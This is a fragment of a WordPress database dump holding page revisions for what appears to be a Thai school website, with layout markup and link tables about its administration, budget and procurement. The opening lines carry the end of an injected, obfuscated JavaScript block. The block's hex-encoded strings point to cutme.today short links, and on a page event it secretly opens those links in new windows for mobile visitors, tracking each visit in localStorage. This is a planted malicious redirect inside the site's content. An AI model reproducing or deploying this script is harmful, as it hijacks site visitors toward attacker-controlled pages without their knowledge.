_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่','','inherit','closed','closed','','784-revision-v1','','','2024-08-09 22:56:10','2024-08-09 15:56:10','',784,'http://pakhaeng.ssk.in.th/?p=821',0,'revision','',0),
(823,1,'2024-08-13 11:37:10','2024-08-13 04:37:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 